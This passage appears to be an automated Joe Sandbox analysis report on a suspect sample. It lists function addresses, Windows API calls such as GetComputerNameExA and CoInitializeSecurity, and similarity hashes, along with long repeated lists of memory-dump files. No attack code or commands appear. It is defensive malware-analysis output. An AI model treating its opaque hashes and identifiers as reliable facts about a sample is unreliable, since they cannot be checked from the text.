                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00C6DD03
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3545744682-0
                                                                                                                                                                                                                                    • Opcode ID: 09c12e7750b41d110ef0c03c0d624ff8650e3afc7dce0e70673b554d459bfacb
                                                                                                                                                                                                                                    • Instruction ID: 3fb782c828ecc1ab3343c4949b117db4de9285fdbc195d0e34e2ef41374ba709
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09c12e7750b41d110ef0c03c0d624ff8650e3afc7dce0e70673b554d459bfacb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A421A4706047918BD7368F25C4A0732BBE1BF5B304F2895CDD4D38B686CA74A546C762
                                                                                                                                                                                                                                    Function 00C7E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00C7E0E0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 4b2d7dc65152e41be01d2100be6a571439a95e5fb7df954e0ab169fd8edb7953
                                                                                                                                                                                                                                    • Instruction ID: 84f9cf6936683e3ecd26aceb94233e7a4d66673c1a6e473606ae77ee91f77a17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b2d7dc65152e41be01d2100be6a571439a95e5fb7df954e0ab169fd8edb7953
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0A032814212FBC2506F38BD05B6B3AA4EFC6720F094479F40896160DA35E816A691
                                                                                                                                                                                                                                    Function 00C4EC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00C4ECA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                                                                                                                    • Opcode ID: 76efde0fde24d89822f38d2f679188599fb7cca3190c6da17d848075b8a2f4ec
                                                                                                                                                                                                                                    • Instruction ID: a3ea7866f7e686d8f6b009c5fd25a612d1dd25b44af2c3298511b934c894c128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76efde0fde24d89822f38d2f679188599fb7cca3190c6da17d848075b8a2f4ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E092343DA3427AF63986259C63F6931165B42F29E306705B3253E3D4CAD07101824C
                                                                                                                                                                                                                                    Function 00C70B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                    • Opcode ID: fb9685c72c8902a68bb964f1500057c03aea04cb0041f3df924c03909c8680cd
                                                                                                                                                                                                                                    • Instruction ID: 4038dd9d4d3e2a6933c34e48ea76879522f14bcb3f1c458608b2c445778960e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9685c72c8902a68bb964f1500057c03aea04cb0041f3df924c03909c8680cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF0DAB4109701CFE354DF28D1A471ABBF0FB89704F10884CE4968B3A0CB75AA48CF82
                                                                                                                                                                                                                                    Function 00C728EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
